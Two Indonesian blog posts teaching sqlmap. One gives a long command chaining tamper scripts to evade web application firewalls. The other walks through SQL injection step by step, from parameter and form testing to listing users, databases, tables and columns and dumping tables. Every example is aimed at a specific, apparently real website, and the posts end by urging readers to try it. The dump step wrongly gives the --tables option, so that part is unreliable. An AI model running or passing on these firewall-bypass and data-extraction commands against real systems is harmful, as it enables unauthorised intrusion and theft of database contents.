Sqlmap Tamper Scripts (Sql Injection dan Bypass Waf) Tutorial

November 21, 2016 2 Comments
Selamat malam pada kesempatan kali ini saya akan membagikan tutorial sederhana hasil surfing di cyber space "Sqlmap Tamper Scripts (Sql Injection dan Bypass Waf)" pastinya kalian sudah tau dengan tools sqlmap kalau belum tau saya akan menjelaskan sedikit tentang tools tersebut. Sqlmap merupakan sebuah tools otomatis opensource (Sumber Terbuka) yang fungsinya untuk melakukan pengujian penetrasi mendeteksi mengexploitasi kelemahan Sqlinjection sqlmap juga mampu mengambil alih server yang sudah di exploitasi.

Didalam tools sqlmap terdapat sebuah script (Tamper Script) script tersebut berbeda-beda fungsi, salah satu fungsi ialah: Bypass proteksi Website (WAF) tahukah kalian script tersebut bisa di gunakan bersama-sama dalam satu baris. Berikut syntaxnya.

 sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords 

Dibawah ini adalah beberapa  jenis set tamper difungsikan untuk (DBMS), sangat berguna ketika pengujian.
  • Script tamper
 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes 
  • Mssql
 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes 
  • Mysql
 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor 

Simple and very easy Good Luck!!

Referensi:

Basic atau Dasar Sql Injection Dengan Sqlmap di Linux

November 20, 2016 2 Comments
Menggunakan sqlmap bisa rumit atau tidak itu terjadi ketika Kamu tidak terbiasa dengan hal itu. Tutorial sqlmap ini bertujuan untuk menyajikan fungsi yang paling penting dari alat injeksi sql terpopuler dengan cara yang cepat dan sederhana. Sebelum menggunakan sqlmap Kamu harus terlebih dahulu mendapatkan rilis terbaru dari alat tersebut dan menginstal interpreter Python. Kebanyakan distribusi Linux memiliki python terinstal secara default. Jika tidak terdapat python atau jika Kamu tidak menggunakan linux, Kamu perlu untuk men-download dan menginstal python.


Menggunakan Sqlmap

Jika sudah mendownload dan Mengekstrak Sqlmap kemudian pergi ke directory tempat tools itu berada dan jalankan perintah berikut.

 python sqlmap.py --help 

Uji Parameter

Untuk menguji parameter kerentanan. Jalankan perintah sqlmap seperti yang ditunjukkan di bawah ini. Pastikan Kamu menentukan URL melalui parameter-u (atau --url) dan menentukan URL lengkap pada halaman yang ingin diuji.

 python sqlmap.py -u "http://teamgear.us/store.php?id=1" 

Pengujian Parameter Post Menggunakan Sqlmap

Dengan tes sqlmap default hanya pada parameter tertentu,  Tetapi kamu dapat menentukan parameter Post Jika ingin memverifikasi. Sqlmap kemudian akan menguji parameter Post yang sudah ditunjukkan. Untuk melakukannya, tambahkan opsi --data seperti ditunjukkan di bawah ini.

 python sqlmap.py --data "username=xyz&password=xyz&submit=xyz" -u "http://teamgear.us/store.php?id=1"  

Bentuk Parse

Sqlmap memiliki fungsi built-in untuk mengurai segala bentuk dalam halaman web dan secara otomatis menguji. Meskipun dalam beberapa kasus scan mungkin tidak seefisien itu adalah ketika secara manual menunjukkan semua parameter, masih berguna dalam banyak situasi. Berikut syntaxnya.

 python sqlmap.py --forms -u "http://teamgear.us/store.php?id=1" 

Tingkatan Test

Dengan sqlmap default akan menguji semua parameter Post yang ditentukan, namun dalam beberapa kasus, Kamu mungkin ingin menguji titik masuk tambahan seperti header HTTP. Hal ini dimungkinkan untuk menentukan dengan opsi khusus, tetapi teknik paling lurus ke depan adalah dengan menggunakan opsi --level. Ada 5 level yang tersedia di sqlmap (default level 1). Level 2 menambahkan HTTP Cookie pengujian header, tingkat 3 menambahkan HTTP User-Agent / Referer header.

 python sqlmap.py -u "http://teamgear.us/store.php?id=1" --level 5 

Penggalian Invormasi Dengan Sqlmap

Hal-hal yang benar-benar menarik dalam sqlmap tutorial ini adalah melakukan penggalian informasi. Ini adalah tugas yang cerewet untuk memulihkan informasi yang tersimpan dalam database dari titik injeksi Sql, terutama ketika tidak ada hasil dikembalikan langsung di halaman web yang rentan. Untungnya, sqlmap memungkinkan tester untuk mengekstrak bagian berharga dari informasi tanpa kerumitan teknik manual.

 --current-user --current-db --is-dba --users --dbs  

Pencacahan Tabel

Ketika pengguna sesi telah membaca akses ke tabel sistem yang berisi informasi tentang tabel "database" sqlmap akan dapat menghitung tabel.

 --tables 

Pencacahan Kolom

Sqlmap juga dapat menghitung kolom. Di sini sekali lagi, pengguna sesi akan perlu memiliki akses baca ke sistem tabel yang berisi informasi tentang tabel database

 --columns 

Dump Tabel

Hal ini bahkan memungkinkan bagi si penyerang untuk membuang seluruh tabel atau database menggunakan opsi berikut.

 --tables 

Documentasi lengkap Sqlmap.org Sekian dari saya selamat mencoba Good Luck!!